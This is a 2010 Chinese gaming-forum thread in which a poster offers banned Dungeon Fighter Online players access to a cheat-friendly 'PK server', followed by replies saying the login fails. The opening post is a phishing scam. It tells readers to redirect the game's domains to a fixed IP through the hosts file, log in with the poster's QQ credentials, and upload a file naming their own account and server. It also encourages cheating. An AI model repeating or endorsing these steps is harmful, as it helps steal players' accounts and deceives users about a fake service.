天龙八步 发表于 2010-10-28 17:12:25

封号一年又如何!换个服务器吧轻松安全放心玩

郁闷死号被封了N个一年!打了N个***!申诉了N次!忍无可忍了!无限不回复!无限失败!伤心了!我想有很多朋友都是这样吧!
                        小天今天教大家如何复制到PK服!用外挂爽!装备超便宜!强10几的终极装备随便你用!、

好了!费话不多说!说正点吧!
                     1。先打开我的电脑!找到 C:\WINDOWS\system32\drivers\et   
                              打开hosts   在最下面输入 121.14.102.243 app.dnf.qq.com
121.14.102.243 dnf.qq.com    然后点保存!
                         解释上面这个IP不要去追查了!这是深圳TX总部IP!别动坏念头!
                     2.打开IE!输入http://dnf.qq.com/RoleCopy/rolecopy.htm
                              3.在登陆处输入QQ(注意不是输你QQ是输我这个QQ)   62458731   密码 098dnf7pkf6
                     4.在桌面新建一个EXE文本文档!在里面输你的账号和区!然后点保存!
                     5。然后回到刚刚登陆QQ的地方!单击下面的浏览!选择刚刚桌面上那个EXE文本!
                     最后等30秒就OK了!
      好了就这样你的号PK服的权限开通了!继续开着外挂去爽吧!PK服开外挂是不掉线的!随便整!

天龙八步 发表于 2010-10-28 17:13:46

自己来个沙发吧!这么好的贴子!没一个人顶吗?伤心中!

拉布拉多刚 发表于 2010-10-28 17:23:20

哥哥,密码错误啊

天龙八步 发表于 2010-10-28 17:32:18

098dnf7pkf6   密码是这样!无大写!自己别输错了

路红摔 发表于 2010-10-28 18:08:05

呵呵!不好玩

徐小白 发表于 2010-10-28 18:25:04

帅气啊,这样都行

点烟丶抽寂寞 发表于 2010-10-28 19:03:54

回复 1# 天龙八步

密码是错的。

天龙八步 发表于 2010-10-28 19:30:25

大哥大姐们注意大小写OK!几小时过去了没个人顶郁闷!这贴子就这么不值钱?BS看贴不回复的

宝贝幸福 发表于 2010-10-28 20:36:06

密码不对啊大哥

强力顶起 发表于 2010-10-28 23:28:48

密码确实不对

小然哦 发表于 2010-10-29 00:07:40

兄弟,我顶你狂顶,本来我也想发的,前几天发了个过检测工具没人顶不说,还被骂,我也没什么心清了,我知道你这号对的,我以前就知道这号了,但是我劝你还是把这号删了吧,没人会顶你的,没必要,很多人都是拿了走人,听我一句把

小小石头是我 发表于 2010-10-29 03:11:08

密码不对啊大哥~

小然哦 发表于 2010-10-29 03:45:01

那号他中间发少了1位数,别费神去登了

天龙八步 发表于 2010-10-31 16:14:20

此号被麻总收回权限了!BS举报B!圈圈叉叉你个妹!

等待升仙 发表于 2010-11-1 01:04:50

- -。失败了看贴回贴

一号土狗 发表于 2010-11-1 02:12:54

失效了!!!!!!!!

lnzhouai 发表于 2010-11-1 02:52:36

号码你就打错了,权限回收了也完蛋还是白搭

天龙八步 发表于 2010-11-21 05:07:18

此贴已失效
页: [1]
查看完整版本: 封号一年又如何!换个服务器吧轻松安全放心玩